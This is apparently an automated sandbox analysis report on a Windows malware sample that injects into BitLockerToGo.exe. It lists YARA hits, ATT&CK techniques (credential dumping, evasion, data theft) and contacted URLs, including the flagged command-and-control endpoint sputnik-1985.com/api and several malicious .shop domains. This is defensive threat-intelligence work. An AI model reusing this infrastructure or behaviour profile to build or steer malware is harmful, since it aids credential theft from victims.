                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: Yara matchFile source: 00000004.00000003.2820648610.000000000319D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.2820715380.0000000003150000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6484, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match | File source: Process Memory Space: BitLockerToGo.exe PID: 6484, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK Matrix (one line per tactic; a leading number is the count shown in the original matrix cell for that technique)

Tactic | Techniques
Reconnaissance | Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development | Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access | Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution | 12 Windows Management Instrumentation; 2 Command and Scripting Interpreter; 1 PowerShell; Cron; Launchd
Persistence | 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation | 311 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion | 21 Virtualization/Sandbox Evasion; 311 Process Injection; 11 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 DLL Side-Loading
Credential Access | 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery | 221 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 1 Process Discovery; 1 File and Directory Discovery; 32 System Information Discovery
Lateral Movement | Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection | 1 Screen Capture; 1 Archive Collected Data; 41 Data from Local System; 2 Clipboard Data; Keylogging
Command and Control | 21 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels
Exfiltration | Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact | Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact

Source | Detection | Scanner | Label
NjFiIQNSid.exe | 46% | Virustotal |
NjFiIQNSid.exe | 37% | ReversingLabs |
NjFiIQNSid.exe | 100% | Avira | TR/Crypt.XPACK.Gen
NjFiIQNSid.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
https://community.fastly.steamstatic.i | 0% | Avira URL Cloud | safe
https://community.fastly.steamstatiy | 0% | Avira URL Cloud | safe
http://cyber.law.harvard.edu/rss/creativeCommonsRssModule.htmllimiterEvent.stop: | 0% | Avira URL Cloud | safe
https://login.s | 0% | Avira URL Cloud | safe
http://schemas.pocketsoap.com/rss/myDescModule/invalid | 0% | Avira URL Cloud | safe
https://sputnik-1985.com/apitvo | 0% | Avira URL Cloud | safe
http://web.resource.org/cc/input | 0% | Avira URL Cloud | safe
https://sputnik-1985.com/api | 0% | Avira URL Cloud | safe
http://postneo.com/icbm/idna: | 0% | Avira URL Cloud | safe
https://sputnik-1985.com/ | 0% | Avira URL Cloud | safe
https://sputnik-1985.com/8=lw | 0% | Avira URL Cloud | safe
https://sputnik-1985.com/apiobH | 0% | Avira URL Cloud | safe
http://www.opengis.net/gmlhttp://xmlns.com/foaf/0.1/integer | 0% | Avira URL Cloud | safe
https://community.fas | 0% | Avira URL Cloud | safe
https://community.fastly.steamstatY | 0% | Avira URL Cloud | safe
http://backend.userland.com/creativeCommonsRssModulehttp://madskills.com/public/xml/rss/module/pingb | 0% | Avira URL Cloud | safe
https://sputnik-1985.com/- | 0% | Avira URL Cloud | safe
https://sputnik-1985.com/api3 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 104.102.49.254 | true | false | | high
sputnik-1985.com | 104.21.112.1 | true | true | | unknown
bootstringjl.click | unknown | unknown | true | | unknown
cloudewahsj.shop | unknown | unknown | false | | high
noisycuttej.shop | unknown | unknown | true | | unknown
nearycrepso.shop | unknown | unknown | true | | unknown
framekgirus.shop | unknown | unknown | true | | unknown
rabidcowse.shop | unknown | unknown | true | | unknown
wholersorie.shop | unknown | unknown | true | | unknown
tirepublicerj.shop | unknown | unknown | true | | unknown
abruptyopsn.shop | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://sputnik-1985.com/api | true | Avira URL Cloud: safe | unknown
https://steamcommunity.com/profiles/76561199724331900 | false | | high
rabidcowse.shop | false | | high
cloudewahsj.shop | false | | high
nearycrepso.shop | false | | high
abruptyopsn.shop | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global. | BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.i | BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | BitLockerToGo.exe, 00000004.00000003.2775147988.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775052601.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2774980988.000000000548C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://player.vimeo.com | BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/publi) | BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | BitLockerToGo.exe, 00000004.00000003.2775147988.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775052601.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2774980988.000000000548C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp | BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/?subsection=broadcasts | BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWT9 | BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://cyber.law.harvard.edu/rss/creativeCommonsRssModule.htmllimiterEvent.stop: | NjFiIQNSid.exe | false | Avira URL Cloud: safe | unknown
https://store.steampowered.com/subscriber_agreement/ | BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.gstatic.cn/recaptcha/ | BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://login.s | BitLockerToGo.exe, 00000004.00000003.2820715380.0000000003150000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://community.fastly.steamstatiy | BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://web.resource.org/cc/input | NjFiIQNSid.exe | false | Avira URL Cloud: safe | unknown
https://sputnik-1985.com/apitvo | BitLockerToGo.exe, 00000004.00000003.2857839635.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2859511619.00000000031A0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.valvesoftware.com/legal.htm | BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=en | BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.youtube.com | BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com | BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.pocketsoap.com/rss/myDescModule/invalid | NjFiIQNSid.exe | false | Avira URL Cloud: safe | unknown
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&a | BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ | BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=engl | BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englis | BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC | BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://s.ytimg.com; | BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi | BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/ | BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english& | BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://podlove.org/simple-chaptersillegal | NjFiIQNSid.exe | false | | high
https://community.fastly.steamstatic.com/ | BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steam.tv/ | BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://postneo.com/icbm/idna: | NjFiIQNSid.exe | false | Avira URL Cloud: safe | unknown
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=en | BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://store.steampowered.com/privacy_agreement/ | BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/points/shop/ | BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | BitLockerToGo.exe, 00000004.00000003.2775147988.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775052601.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2774980988.000000000548C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | BitLockerToGo.exe, 00000004.00000003.2799863216.00000000054FA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/cssK | BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ocsp.rootca1.amazontrust.com0: | BitLockerToGo.exe, 00000004.00000003.2799863216.00000000054FA000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&aBitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://sketchfab.comBitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://www.ecosia.org/newtab/BitLockerToGo.exe, 00000004.00000003.2775147988.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775052601.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2774980988.000000000548C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://lv.queniujq.cnBitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://steamcommunity.com/profiles/76561199724331900/inventory/BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2834241377.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2859436926.0000000003197000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2820648610.0000000003194000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2847490722.0000000003194000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBitLockerToGo.exe, 00000004.00000003.2801049418.0000000005570000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.youtube.com/BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engBitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://sputnik-1985.com/BitLockerToGo.exe, 00000004.00000003.2847490722.00000000031B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://sputnik-1985.com/8=lwBitLockerToGo.exe, 00000004.00000002.2859405148.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2858201528.0000000003151000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2857591004.000000000314F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amBitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.google.com/recaptcha/BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://checkout.steampowered.com/BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://sputnik-1985.com/apiobHBitLockerToGo.exe, 00000004.00000003.2847490722.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2859529654.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2820794733.00000000031A4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2857839635.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2834241377.000000000319D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2820648610.000000000319D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2834367059.00000000031A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://store.steampowered.com/;BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://www.opengis.net/gmlhttp://xmlns.com/foaf/0.1/integerNjFiIQNSid.exefalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://store.steampowered.com/about/BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://community.fasBitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://steamcommunity.com/my/wishlist/BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://help.steampowered.com/en/BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://steamcommunity.com/market/BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://store.steampowered.com/news/BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://community.fastly.steamstatic.coBitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BitLockerToGo.exe, 00000004.00000003.2775147988.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775052601.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2774980988.000000000548C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://store.steampowered.com/subscriber_agreement/BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgBitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://recaptcha.net/recaptcha/;BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://steamcommunity.com/discussions/BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://community.fastly.steamstatYBitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              https://store.steampowered.com/stats/BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amBitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://backend.userland.com/creativeCommonsRssModulehttp://madskills.com/public/xml/rss/module/pingbNjFiIQNSid.exefalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
